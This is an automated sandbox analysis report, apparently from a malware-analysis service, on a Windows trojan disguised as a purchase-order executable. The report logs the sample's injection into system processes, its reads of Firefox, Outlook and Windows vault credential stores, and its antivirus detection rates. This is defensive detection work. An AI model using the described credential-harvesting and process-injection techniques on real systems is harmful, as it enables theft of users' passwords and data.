Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010836EC	0_2_010836EC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CF6F6	0_2_010CF6F6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010559C0	0_2_010559C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01013800	0_2_01013800
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FD99E8	0_2_00FD99E8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01019870	0_2_01019870
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102B870	0_2_0102B870
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01085870	0_2_01085870
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CF872	0_2_010CF872
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010898B2	0_2_010898B2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C18DA	0_2_010C18DA
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C78F3	0_2_010C78F3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0104DB19	0_2_0104DB19
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CFB2E	0_2_010CFB2E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A1B80	0_2_010A1B80
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CFA89	0_2_010CFA89
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102FAA0	0_2_0102FAA0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CFD27	0_2_010CFD27
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C7D4C	0_2_010C7D4C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01019DD0	0_2_01019DD0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AFDF4	0_2_010AFDF4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A9C98	0_2_010A9C98
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01097CE8	0_2_01097CE8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102FCE0	0_2_0102FCE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108FF40	0_2_0108FF40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CFF63	0_2_010CFF63
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C1FC6	0_2_010C1FC6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01011EB2	0_2_01011EB2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C9ED2	0_2_010C9ED2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBE2F5	0_2_00EBE2F5
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBE413	0_2_00EBE413
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBE57B	0_2_00EBE57B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBE7B3	0_2_00EBE7B3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBD878	0_2_00EBD878
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBCB13	0_2_00EBCB13
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03374B13	2_2_03374B13
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_033767B3	2_2_033767B3
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_033762F5	2_2_033762F5
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_0337657B	2_2_0337657B
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03376413	2_2_03376413
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03375878	2_2_03375878
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038FE310	3_2_038FE310
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038B2245	3_2_038B2245
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039B010E	3_2_039B010E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E00A0	3_2_038E00A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0399E076	3_2_0399E076
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A6757	3_2_039A6757
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F2760	3_2_038F2760
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038FA760	3_2_038FA760
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038EC6E0	3_2_038EC6E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03914670	3_2_03914670
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F0445	3_2_038F0445
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03964BC0	3_2_03964BC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F0B10	3_2_038F0B10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03992AC0	3_2_03992AC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039ACA13	3_2_039ACA13
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AEA5B	3_2_039AEA5B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038EE9A0	3_2_038EE9A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AE9A6	3_2_039AE9A6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03906882	3_2_03906882
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F28C0	3_2_038F28C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0391E810	3_2_0391E810
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038D6868	3_2_038D6868
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AEFBF	3_2_039AEFBF
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038FCF00	3_2_038FCF00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A0EAD	3_2_039A0EAD
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E2EE8	3_2_038E2EE8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03910E50	3_2_03910E50
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03932E48	3_2_03932E48
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03990E6D	3_2_03990E6D
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03902DB0	3_2_03902DB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038EAD00	3_2_038EAD00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F0D69	3_2_038F0D69
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03908CDF	3_2_03908CDF
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E0C12	3_2_038E0C12
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038FAC20	3_2_038FAC20
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0396EC20	3_2_0396EC20
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0399EC4C	3_2_0399EC4C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A6C69	3_2_039A6C69
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AEC60	3_2_039AEC60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E1380	3_2_038E1380
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AF330	3_2_039AF330
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038DD2EC	3_2_038DD2EC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0390D210	3_2_0390D210
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A124C	3_2_039A124C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F51C0	3_2_038F51C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0390B1E0	3_2_0390B1E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038DF113	3_2_038DF113
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0398D130	3_2_0398D130
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0393717A	3_2_0393717A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0392508C	3_2_0392508C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038FB0D0	3_2_038FB0D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A70F1	3_2_039A70F1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E170C	3_2_038E170C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AF6F6	3_2_039AF6F6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039636EC	3_2_039636EC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0398D62C	3_2_0398D62C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03991623	3_2_03991623
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0399D646	3_2_0399D646
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AF5C9	3_2_039AF5C9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A75C6	3_2_039A75C6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03985490	3_2_03985490
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0395D480	3_2_0395D480
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03981B80	3_2_03981B80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0392DB19	3_2_0392DB19
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AFB2E	3_2_039AFB2E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AFA89	3_2_039AFA89
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0390FAA0	3_2_0390FAA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039359C0	3_2_039359C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038B99E8	3_2_038B99E8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039698B2	3_2_039698B2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A18DA	3_2_039A18DA
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A78F3	3_2_039A78F3
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F3800	3_2_038F3800
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0390B870	3_2_0390B870
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03965870	3_2_03965870
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AF872	3_2_039AF872
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F9870	3_2_038F9870
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A1FC6	3_2_039A1FC6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0396FF40	3_2_0396FF40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AFF63	3_2_039AFF63
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F1EB2	3_2_038F1EB2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A9ED2	3_2_039A9ED2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038F9DD0	3_2_038F9DD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0398FDF4	3_2_0398FDF4
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039AFD27	3_2_039AFD27
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039A7D4C	3_2_039A7D4C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03989C98	3_2_03989C98
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_0390FCE0	3_2_0390FCE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03977CE8	3_2_03977CE8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B1FD0	3_2_030B1FD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030AB1C4	3_2_030AB1C4
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030AB1D0	3_2_030AB1D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030A11E7	3_2_030A11E7
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030AB07F	3_2_030AB07F
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030AB080	3_2_030AB080
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030AD0A0	3_2_030AD0A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B5680	3_2_030B5680
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B387B	3_2_030B387B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B3880	3_2_030B3880
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030ACE80	3_2_030ACE80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030CBCD0	3_2_030CBCD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037AE2F5	3_2_037AE2F5
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037AE7B3	3_2_037AE7B3
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037AE57B	3_2_037AE57B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037AE413	3_2_037AE413
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037ACB13	3_2_037ACB13
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037AD878	3_2_037AD878

Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 0395E692 appears 83 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 0396EF10 appears 90 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 03937BE4 appears 91 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 03925050 appears 58 times
Source: C:\Windows\SysWOW64\fc.exe	Code function: String function: 038DB910 appears 219 times
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: String function: 0107E692 appears 84 times
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: String function: 00FFB910 appears 219 times
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: String function: 01045050 appears 58 times
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: String function: 0108EF10 appears 90 times
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: String function: 01057BE4 appears 91 times

Source: PO_62401394_MITech_20250601.exe

Static PE information: No import functions for PE file found

Source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22341940785.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO_62401394_MITech_20250601.exe
Source: PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO_62401394_MITech_20250601.exe
Source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFC.EXEj% vs PO_62401394_MITech_20250601.exe
Source: PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000012A0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO_62401394_MITech_20250601.exe
Source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFC.EXEj% vs PO_62401394_MITech_20250601.exe
Source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22338550706.0000000000D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO_62401394_MITech_20250601.exe

Source: PO_62401394_MITech_20250601.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO_62401394_MITech_20250601.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@6/6

Source: C:\Windows\SysWOW64\fc.exe

File created: C:\Users\user\AppData\Local\Temp\17O3k-2I

Jump to behavior

Source: PO_62401394_MITech_20250601.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fc.exe, 00000003.00000002.23287225942.00000000082DC000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: fc.exe, 00000003.00000003.22607028047.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22603085140.0000000003292000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23284109384.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fc.exe, 00000003.00000002.23284109384.00000000032D6000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22611963148.0000000008343000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: PO_62401394_MITech_20250601.exe	ReversingLabs: Detection: 68%
Source: PO_62401394_MITech_20250601.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe "C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO_62401394_MITech_20250601.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22425274259.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO_62401394_MITech_20250601.exe, 00000000.00000003.22341940785.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000003.22338550706.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000039DD000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22428795786.0000000003707000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22425616266.0000000003552000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO_62401394_MITech_20250601.exe, PO_62401394_MITech_20250601.exe, 00000000.00000003.22341940785.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000003.22338550706.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmp, PO_62401394_MITech_20250601.exe, 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000003.00000002.23285369881.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23285369881.00000000039DD000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22428795786.0000000003707000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22425616266.0000000003552000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C390BB pushad ; iretd	0_2_00C390E4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C33863 push ss; iretd	0_2_00C33880
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C23490 push eax; ret	0_2_00C23492
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C34DC4 pushfd ; retf	0_2_00C34DCE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FD21AD pushad ; retf 0004h	0_2_00FD223F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010008CD push ecx; mov dword ptr [esp], ecx	0_2_010008D6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FD97A1 push es; iretd	0_2_00FD97A8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBC033 push ss; iretd	0_2_00EBC036
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EB71EA push es; ret	0_2_00EB71EB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EC5202 push eax; ret	0_2_00EC5204
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBB3C8 push edi; ret	0_2_00EBB445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBB3C4 push edi; ret	0_2_00EBB445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBBA5F push cs; retf	0_2_00EBBA67
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EBAE60 push ds; retf	0_2_00EBAE61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_033733C4 push edi; ret	2_2_03373445
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_033733C8 push edi; ret	2_2_03373445
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_0337D202 push eax; ret	2_2_0337D204
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03372E60 push ds; retf	2_2_03372E61
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03373A5F push cs; retf	2_2_03373A67
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_0336F1EA push es; ret	2_2_0336F1EB
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_0336F5C8 push ds; ret	2_2_0336F7FA
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 2_2_03374033 push ss; iretd	2_2_03374036
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038B21AD pushad ; retf 0004h	3_2_038B223F
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038E08CD push ecx; mov dword ptr [esp], ecx	3_2_038E08D6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_038B97A1 push es; iretd	3_2_038B97A8
